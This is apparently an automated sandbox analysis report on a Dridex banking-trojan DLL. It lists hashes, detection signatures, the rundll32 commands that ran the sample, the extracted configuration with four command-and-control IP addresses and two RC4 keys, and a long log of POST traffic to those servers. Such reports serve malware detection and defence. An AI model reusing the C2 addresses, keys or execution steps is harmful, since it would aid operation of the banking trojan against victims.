Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.31954.24049

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.31954.24049 (renamed file extension from 24049 to dll)
Analysis ID:510691
MD5:b550657c2ac0bf9940617b669d6870b1
SHA1:2071b204899736be74379f1197b13700e6de3a09
SHA256:e3244d67b76615adcc86f39f00f49ae345e18f2e9136f5305a438a4a6601e7e9
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6828 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6844 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6864 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6852 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6948 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.31954.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.764183510.0000000004D80000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000000.00000003.799249940.0000000001000000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000000.00000002.1188824547.000000006E361000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000008.00000003.799320451.00000000048E0000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000007.00000003.782470238.0000000000690000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.4d9db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              3.3.rundll32.exe.61db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                0.3.loaddll32.exe.101db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  7.3.rundll32.exe.6adb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    7.3.rundll32.exe.6adb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.loaddll32.exe.6e360000.0.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllReversingLabs: Detection: 27%
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.1189544778.000000006E427000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1192090011.000000006E427000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.31954.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4853Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.4:49761 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.4:49776 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.4:49778 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
